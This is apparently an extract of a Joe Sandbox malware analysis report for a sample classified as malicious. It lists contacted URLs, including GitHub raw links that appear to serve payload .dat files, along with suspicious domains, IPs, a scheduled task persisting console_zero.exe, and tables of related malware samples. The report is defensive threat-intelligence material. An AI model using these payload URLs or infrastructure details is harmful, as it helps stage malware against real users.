                                  https://curl.se/docs/alt-svc.html58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmpfalse
                                    		high
                                    https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.datsvchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847222227.0000013B8448C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.2211131614.0000013B844EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.openssl.org/svchost.exefalse
                                        		high
                                        https://curl.se/docs/hsts.html58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          		high
                                          https://curl.se/docs/alt-svc.html#console_zero.exefalse
                                            		high
                                            https://curl.se/docs/copyright.htmlD58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848835181.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808475835.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826970264.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmpfalse
                                              		high
                                              https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.datsvchost.exe, 0000001A.00000003.2211131614.0000013B844E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://curl.se/svchost.exe, console_zero.exefalse
                                                  		high
                                                  http://www.zlib.net/svchost.exefalse
                                                    		high
                                                    http://mingw-w64.sourceforge.net/X58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpfalse
                                                      		high
                                                      https://curl.se/docs/copyright.htmlsvchost.exe, console_zero.exefalse
                                                        		high
                                                        http://www.zlib.net/D58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848995492.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808573202.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827153646.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmpfalse
                                                          		high
                                                          https://curl.se/docs/hsts.html#console_zero.exefalse
                                                            		high
                                                            https://www.openssl.org/H58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2847985695.00007FFBAA11E000.00000002.00000001.01000000.0000000B.sdmp, svchost.exe, 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                              		high
                                                              https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.datsvchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/usvchost.exe, 0000001A.00000002.2847427687.0000013B84902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://curl.se/docs/http-cookies.html#console_zero.exefalse
                                                                    		high
                                                                    https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/unvumainrestorehardx.datsvchost.exe, 0000001A.00000002.2847310661.0000013B844F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.datsvchost.exe, 0000001A.00000002.2847028150.0000013B84463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.gnu.org/licenses/58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2846258321.00000000682A4000.00000008.00000001.01000000.0000000D.sdmpfalse
                                                                          		high
                                                                          https://curl.se/V58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848835181.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808475835.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826970264.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            194.26.192.189
                                                                            		unvmainx.comNetherlands
                                                                            		1213HEANETIEfalse
                                                                            45.94.31.128
                                                                            		unvdwl.comNetherlands
                                                                            		395800GBTCLOUDUSfalse
                                                                            34.117.59.81
                                                                            		ipinfo.ioUnited States
                                                                            		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                            8.8.4.4
                                                                            		dns.googleUnited States
                                                                            		15169GOOGLEUSfalse
                                                                            185.199.108.133
                                                                            		raw.githubusercontent.comNetherlands
                                                                            		54113FASTLYUSfalse
                                                                            20.233.83.145
                                                                            		github.comUnited States
                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                            Private

                                                                            IP
                                                                            127.0.0.1

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1578892
                                                                            Start date and time:2024-12-20 16:18:35 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 11m 37s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:58
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:58VSNPxrI4.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:228c09c31156d45dfe94195bb34d1399.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.evad.winEXE@86/46@9/7
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:Failed
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.43
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target 58VSNPxrI4.exe, PID 3576 because there are no executed function
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            10:19:51API Interceptor94x Sleep call for process: powershell.exe modified
                                                                            10:20:04API Interceptor1x Sleep call for process: svchost.exe modified
                                                                            10:20:04API Interceptor2x Sleep call for process: console_zero.exe modified
                                                                            16:20:06Task SchedulerRun new task: console_zero path: C:\Windows\System32\console_zero.exe

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            34.117.59.81file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                            • ipinfo.io/json
                                                                            Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                            • ipinfo.io/json
                                                                            idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                            • ipinfo.io/json
                                                                            FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                            • ipinfo.io/json
                                                                            licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                            • ipinfo.io/ip
                                                                            185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            ipinfo.iomain1.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                            • 34.117.59.81
                                                                            pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            https://bu.marcel-andree.de/Get hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                            • 34.117.59.81
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            github.comfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                            • 20.233.83.145
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                            • 20.233.83.145
                                                                            ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                            • 20.233.83.145
                                                                            ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                            • 20.233.83.145
                                                                            https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                            • 140.82.112.3
                                                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                            • 140.82.121.4
                                                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                            • 20.233.83.145
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                            • 20.233.83.145
                                                                            https://github.com/starise/win11-virtual-desktop-extension/releases/download/1.1.0/VirtualDesktopExtension-1.1.0.msiGet hashmaliciousUnknownBrowse
                                                                            • 20.233.83.145
                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                            • 20.233.83.145
                                                                            raw.githubusercontent.comfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                            • 185.199.110.133
                                                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                            • 185.199.109.133
                                                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                            • 185.199.108.133
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                            • 185.199.109.133
                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                            • 185.199.111.133
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                            • 185.199.110.133
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                            • 185.199.111.133
                                                                            pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.110.133
                                                                            Lu4421.exeGet hashmaliciousStealeriumBrowse
                                                                            • 185.199.111.133
                                                                            Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                            • 185.199.108.133

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            HEANETIEla.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                            • 87.39.143.62
                                                                            la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                            • 87.41.150.19
                                                                            mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 149.153.196.98
                                                                            3.elfGet hashmaliciousUnknownBrowse
                                                                            • 157.191.210.99
                                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 87.38.224.2
                                                                            1.elfGet hashmaliciousUnknownBrowse
                                                                            • 157.190.28.141
                                                                            mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 87.38.250.49
                                                                            2.elfGet hashmaliciousUnknownBrowse
                                                                            • 157.190.146.192
                                                                            3.elfGet hashmaliciousUnknownBrowse
                                                                            • 87.47.197.151
                                                                            la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                            • 134.226.72.65
                                                                            GBTCLOUDUSsh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 5.183.206.192
                                                                            akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                            • 154.37.70.165
                                                                            x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 45.11.15.123
                                                                            botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.37.105.101
                                                                            loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 2.58.149.182
                                                                            sparc.elfGet hashmaliciousOkiruBrowse
                                                                            • 154.37.39.10
                                                                            VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                                            • 212.87.215.19
                                                                            AD6dpKQm7n.exeGet hashmaliciousUnknownBrowse
                                                                            • 45.94.31.26
                                                                            ickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.241.208.183
                                                                            EXQuAzl4Xn.exeGet hashmaliciousRedLineBrowse
                                                                            • 185.241.208.193
                                                                            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                            • 34.117.188.166
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                            • 34.117.188.166
                                                                            ghostspider.7zGet hashmaliciousUnknownBrowse
                                                                            • 34.117.188.166
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 34.117.188.166
                                                                            https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                            • 34.117.39.58
                                                                            http://112.31.189.32:40158Get hashmaliciousMiraiBrowse
                                                                            • 34.117.121.53
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                            • 34.117.188.166
                                                                            arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 34.67.216.185
                                                                            main1.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                            • 34.117.59.81
                                                                            https://pdf.ac/4lLzbtGet hashmaliciousUnknownBrowse
                                                                            • 34.117.39.58
                                                                            FASTLYUShttps://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTAGet hashmaliciousUnknownBrowse
                                                                            • 151.101.1.138
                                                                            Invoice for 04-09-24 fede39.admr.org.htmlGet hashmaliciousUnknownBrowse
                                                                            • 151.101.1.229
                                                                            https://alphaarchitect.com/2024/12/long-term-expected-returns/Get hashmaliciousUnknownBrowse
                                                                            • 199.232.168.157
                                                                            Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.108.153
                                                                            https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291Get hashmaliciousUnknownBrowse
                                                                            • 199.232.168.157
                                                                            https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.2.137
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                            • 185.199.110.133
                                                                            https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA%20us-east-2.protection.sophos.comGet hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.130.137
                                                                            Dec 2024_12192924_Image.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.194.137
                                                                            http://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                                                            • 151.101.130.137

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            bd0bf25947d4a37404f0424edf4db9adpyld611114.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            SecuriteInfo.com.Win64.Evo-gen.6610.27408.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            SecuriteInfo.com.Win64.Evo-gen.9614.31304.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            app64.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            SecuriteInfo.com.FileRepMalware.12585.5759.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            sadfwqefrqw3f.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            74954a0c86284d0d6e1c4efefe92b521676556be12ac3.vbsGet hashmaliciousMint StealerBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.htaGet hashmaliciousMint StealerBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            Hkeyboard.dllGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            webhook.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            loader.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81
                                                                            loader.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.8.4.4
                                                                            • 185.199.108.133
                                                                            • 20.233.83.145
                                                                            • 34.117.59.81

                                                                            Dropped Files

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\Windows \System32\printui.exepyld611114.exeGet hashmaliciousUnknownBrowse
                                                                              dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                                SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                  app64.exeGet hashmaliciousUnknownBrowse
                                                                                    printui.dllGet hashmaliciousUnknownBrowse
